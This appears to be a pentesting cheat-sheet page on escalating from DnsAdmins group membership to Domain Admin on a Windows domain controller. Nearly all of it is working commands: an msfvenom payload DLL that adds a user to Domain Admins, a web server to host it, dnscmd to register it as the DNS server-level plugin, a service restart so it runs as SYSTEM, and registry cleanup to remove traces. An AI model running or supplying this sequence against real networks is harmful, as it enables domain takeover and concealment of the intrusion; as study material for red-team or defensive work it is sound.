DnsAdmins

ABOUT

Members of the DnsAdmins group can access DNS information within the network. The Windows DNS service allows custom plugins, which can execute functions to resolve name queries beyond the locally hosted DNS zones. Since the DNS service operates with NT AUTHORITY\SYSTEM privileges, being part of this group could be exploited to escalate privileges on a Domain Controller or a dedicated DNS server for the domain. The built-in dnscmd utility can be used to define the path of the plugin DLL.

Importing custom plugin

Generating malicious dll

msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dll

Starting local HTTP server

python3 -m http.server 1337

Loading DLL

You should be DnsAdmins group member!

C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dll

If successful: Registry property serverlevelplugindll successfully reset.

Restart DNS Service

C:\> sc.exe stop dns
C:\> sc.exe start dns

Confirm Admin Privileges

PS C:\> net group "Domain Admins" /dom

Cleanup

Confirming Registry Key Added

C:\> reg query \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Delete Registry Key

C:\> reg delete \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS Service

C:\> sc.exe start dns
C:\> sc query dns

PreviousPrint Operators NextEvent Log Readers

Last updated 9 months ago

hashtagABOUT

hashtagImporting custom plugin

hashtagGenerating malicious dll

hashtagStarting local HTTP server

hashtagLoading DLL

hashtagRestart DNS Service

hashtagConfirm Admin Privileges

hashtagCleanup

hashtagConfirming Registry Key Added

hashtagDelete Registry Key

hashtagRestart DNS Service

ABOUT

Importing custom plugin

Generating malicious dll

Starting local HTTP server

Loading DLL

Restart DNS Service

Confirm Admin Privileges

Cleanup

Confirming Registry Key Added

Delete Registry Key

Restart DNS Service